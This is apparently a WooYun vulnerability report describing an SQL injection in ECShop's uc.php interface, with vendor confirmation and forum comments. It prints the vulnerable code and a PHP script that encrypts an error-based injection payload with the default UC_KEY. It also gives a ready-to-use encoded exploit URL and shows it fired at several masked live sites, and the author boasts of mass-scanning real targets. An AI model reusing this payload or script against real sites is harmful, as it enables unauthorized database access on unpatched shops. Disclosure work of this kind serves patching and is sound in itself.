当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(92) 关注此漏洞

缺陷编号: WooYun-2016-174468

漏洞标题: ECShop最新版某处接口SQL注入

相关厂商: ShopEx

漏洞作者: Angle_G认证白帽子

提交时间: 2016-02-03 11:41

公开时间: 2016-01-28 17:30

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

13人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-03: 细节已通知厂商并且等待厂商处理中
2016-02-05: 厂商已经确认,细节仅向厂商公开
2016-02-08: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT
不知道有没有被提交过!有条件,经测试,大站,蛮好拿!!!=_=!!

详细说明:

先来看注入

在文件/api/uc.php 中

该文件可能是用作 与ucenter做接口的,ecshop在默认存在

code 区域
..........................


if(!defined('IN_UC'))


{


    error_reporting(0);


    set_magic_quotes_runtime(0);


    defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());





    $_DCACHE = $get = $post = array();





    $code = @$_GET['code'];


    parse_str(_authcode($code, 'DECODE', UC_KEY), $get);


    if(MAGIC_QUOTES_GPC)


    {


        $get = _stripslashes($get);


    }





    $timestamp = time();


    if($timestamp - $get['time'] > 3600)


    {


        exit('Authracation has expiried');


    }


    if(empty($get))


    {


        exit('Invalid Request');


    }


}





$action = $get['action'];


include(ROOT_PATH . 'uc_client/lib/xml.class.php');


$post = xml_unserialize(file_get_contents('php://input'));





if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings')))


{


    $uc_note = new uc_note();


    exit($uc_note->$get['action']($get, $post));


}


else


{


    exit(API_RETURN_FAILED);


}





$ecs_url = str_replace('/api', '', $ecs->url());





.............................



code变量从get中获取后经过_authcode函数解密成字符串 赋值到变量中。



在来看_authcode函数

code 区域
<?php 


function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)


{


    $ckey_length = 4;


    $key = md5($key ? $key : UC_KEY);


    $keya = md5(substr($key, 0, 16));


    $keyb = md5(substr($key, 16, 16));


    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';





    $cryptkey = $keya.md5($keya.$keyc);


    $key_length = strlen($cryptkey);





    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


    $string_length = strlen($string);





    $result = '';


    $box = range(0, 255);





    $rndkey = array();


    for($i = 0; $i <= 255; $i++)


    {


        $rndkey[$i] = ord($cryptkey[$i % $key_length]);


    }





    for($j = $i = 0; $i < 256; $i++)


    {


        $j = ($j + $box[$i] + $rndkey[$i]) % 256;


        $tmp = $box[$i];


        $box[$i] = $box[$j];


        $box[$j] = $tmp;


    }





    for($a = $j = $i = 0; $i < $string_length; $i++)


    {


        $a = ($a + 1) % 256;


        $j = ($j + $box[$a]) % 256;


        $tmp = $box[$a];


        $box[$a] = $box[$j];


        $box[$j] = $tmp;


        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


    }





    if($operation == 'DECODE')


    {


        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16))


        {


            return substr($result, 26);


        }


        else


        {


            return '';


        }


    }


    else


    {


        return $keyc.str_replace('=', '', base64_encode($result));


    }


}



很多整合uc系统都用到这个!!!!

但是常量密匙UC_KEY,定义为为UC_KEY不变,



然后在调用后面定义的函数,所以这里通过_authcode算法自行加密,请求几乎无视GPC



但是要整合uc,uc_client文件没有所以得上传,也是小鸡肋了,这个洞,、、

但是还是有很多都整合了,都上传了这个文件夹

uc下载地址:http://**.**.**.**/downloads/install/discuzx



本地测试的下载uc,把uc_client上传上去就可以了,因为他有一个xml_unserialize函数包含在uc_client/lib/xml.class.php文件中,所以鸡肋了!!!!!!



附一下加密脚本:

code 区域
<?php 


function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)


{


    $ckey_length = 4;


    $key = md5($key ? $key : UC_KEY);


    $keya = md5(substr($key, 0, 16));


    $keyb = md5(substr($key, 16, 16));


    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';





    $cryptkey = $keya.md5($keya.$keyc);


    $key_length = strlen($cryptkey);





    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;


    $string_length = strlen($string);





    $result = '';


    $box = range(0, 255);





    $rndkey = array();


    for($i = 0; $i <= 255; $i++)


    {


        $rndkey[$i] = ord($cryptkey[$i % $key_length]);


    }





    for($j = $i = 0; $i < 256; $i++)


    {


        $j = ($j + $box[$i] + $rndkey[$i]) % 256;


        $tmp = $box[$i];


        $box[$i] = $box[$j];


        $box[$j] = $tmp;


    }





    for($a = $j = $i = 0; $i < $string_length; $i++)


    {


        $a = ($a + 1) % 256;


        $j = ($j + $box[$a]) % 256;


        $tmp = $box[$a];


        $box[$a] = $box[$j];


        $box[$j] = $tmp;


        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


    }





    if($operation == 'DECODE')


    {


        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16))


        {


            return substr($result, 26);


        }


        else


        {


            return '';


        }


    }


    else


    {


        return $keyc.str_replace('=', '', base64_encode($result));


    }


}


define('UC_KEY', 'UC_KEY');


$test = "time=11111111111111111111&action=deleteuser&ids=1) or updatexml(1,concat(1,user()),1)#";


$test = _authcode($test, 'ENCODE', UC_KEY);


var_dump($test);





?>





code 区域
EXP:/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ





批量了下一下,还蛮多的!!!!!!



QQ截图20160202201421.png

QQ截图20160202201404.png





特别整合论坛和商城的,很好用!!!

漏洞证明:

http://**.**.**.**/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ

QQ截图20160202201622.png



http://**.**.**.**/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ

QQ截图20160202201715.png



http://**.**.**.**/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ

QQ截图20160202201742.png



http://**.**.**.**/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ

QQ截图20160202201841.png



http://**.**.**.**/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ

QQ截图20160202202001.png

修复方案:

parse_str(_authcode($code, 'DECODE', UC_KEY), $get);

这一句,解密code复制$get,对变量get处理即可!!!!!

版权声明:转载请注明来源 Angle_G@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-02-05 11:07

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-02-03 11:45 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)
    1

    前排

    1# 回复此人
  2. 2016-02-03 12:55 | Kuuki ( 普通白帽子 | Rank:175 漏洞数:25 | :P)
    0

    第二排

    2# 回复此人
  3. 2016-02-03 13:24 | 一只寂寞的小鸟 ( 实习白帽子 | Rank:46 漏洞数:11 | ส็็็็็็็็็็็็็็็็็็็...)
    0

    第三排

    3# 回复此人
  4. 2016-02-05 11:24 | 梦皑皑 ( 路人 | Rank:1 漏洞数:1 | 本人小白,缺团队培养。)
    0

    第四排

    4# 回复此人
  5. 2016-02-05 15:03 | 光的传人 ( 普通白帽子 | Rank:162 漏洞数:28 | IT爱好者~)
    0

    第五排

    5# 回复此人
  6. 2016-02-06 19:53 | 包包不是包 ( 路人 | Rank:7 漏洞数:5 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)
    0

    大牛

    6# 回复此人
  7. 2016-02-07 22:36 | by:安全者 ( 路人 | Rank:26 漏洞数:7 | xxs,sql注入)
    0

    啥时候可以提前看呀,求教育

    7# 回复此人
  8. 2016-02-08 14:53 | Pharaoh ( 路人 | Rank:2 漏洞数:1 | hello world)
    0

    接口注入,这个好期待

    8# 回复此人
  9. 2016-02-13 22:07 | huotoo ( 路人 | Rank:22 漏洞数:4 | 努力学习中)
    0

    围观

    9# 回复此人
  10. 2016-04-11 11:56 | 酷帥王子 ( 普通白帽子 | Rank:262 漏洞数:71 | 天之屌,人之神!天人合一,乃屌神也!绝对...)
    1

    666666不够6的话再加2个66666666

    10# 回复此人
  11. 2016-04-13 16:12 | 淡茶de清香 ( 路人 | Rank:2 漏洞数:1 | 收集)
    1

    接口注入,这个好期待

    11# 回复此人
  12. 2016-04-20 13:05 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)
    0

    火钳刘明

    12# 回复此人
  13. 2016-04-22 00:09 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)
    0

    提交出现 Authracation has expiried 怎么破@Angle_G

    13# 回复此人
  14. 2016-04-22 10:17 | 诚殷的小白帽 ( 实习白帽子 | Rank:70 漏洞数:34 )
    0

    后排补上,有大牛能查看漏洞求发送doc。wzaq123@126.com

    14# 回复此人
  15. 2016-04-22 15:32 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)
    0

    @诚殷的小白帽 你不是实习白帽子吗 你看不到吗》?

    15# 回复此人
  16. 2016-04-22 22:18 | 诚殷的小白帽 ( 实习白帽子 | Rank:70 漏洞数:34 )
    0

    @discovery 3rank已经支付。

    16# 回复此人
  17. 2016-04-25 20:10 | 1c3z ( 普通白帽子 | Rank:297 漏洞数:63 | @)!^)
    0

    不鸡肋呀。。 Warning: include(xxxxx/uc_client/lib/xml.class.php) [function.include]: failed to open stream: No such file or directory in xxxxxx\api\uc.php on line 37

    17# 回复此人

登录后才能发表评论,请先 登录